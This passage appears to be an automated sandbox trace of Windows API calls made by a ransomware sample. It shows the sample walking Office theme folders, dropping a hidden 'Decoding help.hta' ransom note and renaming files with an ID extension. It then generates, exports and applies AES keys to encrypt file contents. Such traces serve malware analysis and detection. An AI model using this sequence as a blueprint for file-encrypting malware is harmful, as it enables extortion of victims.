ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdad6ec00, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xe58e, dwReserved0=0x0, dwReserved1=0x0, cFileName="AFTRNOON.ELM", cAlternateFileName="")) returned 1 [0048.639] lstrcpyW (in: lpString1=0x10fe7650, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\*.*" [0048.639] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\*.*") returned 72 [0048.639] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\Decoding help.hta" [0048.639] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\decoding help.hta")) returned 0xffffffff [0048.639] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0052.051] WriteFile (in: hFile=0x41c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x6eafcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x6eafcf8*=0x78e, lpOverlapped=0x0) returned 1 [0055.580] CloseHandle (hObject=0x41c) returned 1 [0056.954] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.523] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AFTRNOON.ELM") returned 1 [0058.523] lstrlenW (lpString="AFTRNOON.ELM") returned 12 [0058.523] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\*.*" [0058.523] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\*.*") returned 72 [0058.523] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\", lpString2="AFTRNOON.ELM" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.ELM") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.ELM" [0058.523] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.ELM" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.ELM") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.ELM" [0058.523] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.ELM", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.ELM.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.ELM.[ID]g9uZrLhJaygpwRm1[ID]" [0058.523] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\aftrnoon.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.ELM.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\aftrnoon.elm.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.678] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.ELM.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\aftrnoon.elm.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd90 [0061.678] CreateFileMappingA (hFile=0xd90, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xe64 [0061.678] CryptAcquireContextA (phProv=0x6eafcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 584 os_tid = 0xd64 [0048.655] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\*.*", lpFindFileData=0x7c4fd30 | out: lpFindFileData=0x7c4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671df0 [0053.630] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0053.630] FindNextFileW (in: hFindFile=0x671df0, lpFindFileData=0x7c4fd30 | out: lpFindFileData=0x7c4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.630] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0053.630] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0053.630] FindNextFileW (in: hFindFile=0x671df0, lpFindFileData=0x7c4fd30 | out: lpFindFileData=0x7c4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc081900, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x5146e3d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdc081900, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0x10fc7, dwReserved0=0x0, dwReserved1=0x0, cFileName="ARCTIC.ELM", cAlternateFileName="")) returned 1 [0053.632] lstrcpyW (in: lpString1=0x2a720258, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\*.*" [0053.632] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\*.*") returned 70 [0053.632] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\Decoding help.hta" [0053.632] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\decoding help.hta")) returned 0xffffffff [0053.632] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x444 [0055.307] WriteFile (in: hFile=0x444, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x7c4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x7c4fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0056.445] CloseHandle (hObject=0x444) returned 1 [0056.445] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0056.749] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ARCTIC.ELM") returned 1 [0056.749] lstrlenW (lpString="ARCTIC.ELM") returned 10 [0056.749] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\*.*" [0056.749] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\*.*") returned 70 [0056.749] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\", lpString2="ARCTIC.ELM" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.ELM") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.ELM" [0056.749] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.ELM" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.ELM") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.ELM" [0056.749] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.ELM", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.ELM.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.ELM.[ID]g9uZrLhJaygpwRm1[ID]" [0056.749] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\arctic.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.ELM.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\arctic.elm.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0060.619] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.ELM.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\arctic.elm.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xbb8 [0060.620] CreateFileMappingA (hFile=0xbb8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xd7c [0060.620] CryptAcquireContextA (in: phProv=0x7c4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x7c4fcec*=0x10e28928) returned 1 [0060.620] CryptGenKey (in: hProv=0x10e28928, Algid=0x6610, dwFlags=0x1, phKey=0x7c4fce8 | out: phKey=0x7c4fce8*=0x10a4aea8) returned 1 [0060.620] CryptExportKey (in: hKey=0x10a4aea8, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x7c4fbe4, pdwDataLen=0x7c4fce4 | out: pbData=0x7c4fbe4*, pdwDataLen=0x7c4fce4*=0x2c) returned 1 [0060.620] MapViewOfFile (hFileMappingObject=0xd7c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10fc0) returned 0x3930000 [0063.904] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7c4fbe4*, pdwDataLen=0x7c4fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x7c4fbe4*, pdwDataLen=0x7c4fcf8*=0x100) returned 1 [0063.904] CryptEncrypt (hKey=0x10a4aea8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3930000, pdwDataLen=0x7c4fce4*=0x10fc0, dwBufLen=0x10fc0) Thread: id = 585 os_tid = 0xd68 [0048.665] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\*.*", lpFindFileData=0x7d4fd30 | out: lpFindFileData=0x7d4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51767f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671eb0 [0053.633] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0053.633] FindNextFileW (in: hFindFile=0x671eb0, lpFindFileData=0x7d4fd30 | out: lpFindFileData=0x7d4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51767f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.633] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0053.633] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0053.633] FindNextFileW (in: hFindFile=0x671eb0, lpFindFileData=0x7d4fd30 | out: lpFindFileData=0x7d4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd394600, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51767f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd394600, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0x189be, dwReserved0=0x0, dwReserved1=0x0, cFileName="AXIS.ELM", cAlternateFileName="")) returned 1 [0053.635] lstrcpyW (in: lpString1=0x2a728260, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\*.*" [0053.635] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\*.*") returned 68 [0053.635] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\Decoding help.hta" [0053.635] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\decoding help.hta")) returned 0xffffffff [0053.635] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x70c [0055.307] WriteFile (in: hFile=0x70c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x7d4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x7d4fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0056.452] CloseHandle (hObject=0x70c) returned 1 [0056.452] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0056.751] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AXIS.ELM") returned 1 [0056.751] lstrlenW (lpString="AXIS.ELM") returned 8 [0056.751] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\*.*" [0056.751] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\*.*") returned 68 [0056.751] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\", lpString2="AXIS.ELM" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM" [0056.751] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM" [0056.751] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM.[ID]g9uZrLhJaygpwRm1[ID]" [0056.751] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\axis.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\axis.elm.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0060.618] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\axis.elm.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd88 [0060.618] CreateFileMappingA (hFile=0xd88, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x924 [0060.618] CryptAcquireContextA (in: phProv=0x7d4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x7d4fcec*=0x10e288a0) returned 1 [0060.619] CryptGenKey (in: hProv=0x10e288a0, Algid=0x6610, dwFlags=0x1, phKey=0x7d4fce8 | out: phKey=0x7d4fce8*=0x10a4ae28) returned 1 [0060.619] CryptExportKey (in: hKey=0x10a4ae28, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x7d4fbe4, pdwDataLen=0x7d4fce4 | out: pbData=0x7d4fbe4*, pdwDataLen=0x7d4fce4*=0x2c) returned 1 [0060.619] MapViewOfFile (hFileMappingObject=0x924, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x189a0) Thread: id = 586 os_tid = 0xd6c [0048.670] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\*.*", lpFindFileData=0x7e4fd30 | out: lpFindFileData=0x7e4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671f30 [0053.635] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0053.635] FindNextFileW (in: hFindFile=0x671f30, lpFindFileData=0x7e4fd30 | out: lpFindFileData=0x7e4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.635] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0053.635] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0053.635] FindNextFileW (in: hFindFile=0x671f30, lpFindFileData=0x7e4fd30 | out: lpFindFileData=0x7e4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe32f2700, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51a15810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe32f2700, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0x10db7, dwReserved0=0x0, dwReserved1=0x0, cFileName="BLENDS.ELM", cAlternateFileName="")) returned 1 [0053.636] lstrcpyW (in: lpString1=0x2a730268, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\*.*" [0053.636] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\*.*") returned 70 [0053.636] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\Decoding help.hta" [0053.636] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\decoding help.hta")) returned 0xffffffff [0053.636] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b4 [0055.308] WriteFile (in: hFile=0x6b4, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x7e4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x7e4fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0056.453] CloseHandle (hObject=0x6b4) returned 1 [0056.453] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0056.753] lstrcmpiW (lpString1="Decoding help.hta", lpString2="BLENDS.ELM") returned 1 [0056.753] lstrlenW (lpString="BLENDS.ELM") returned 10 [0056.753] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\*.*" [0056.753] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\*.*") returned 70 [0056.753] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\", lpString2="BLENDS.ELM" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.ELM") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.ELM" [0056.753] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.ELM" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.ELM") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.ELM" [0056.753] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common 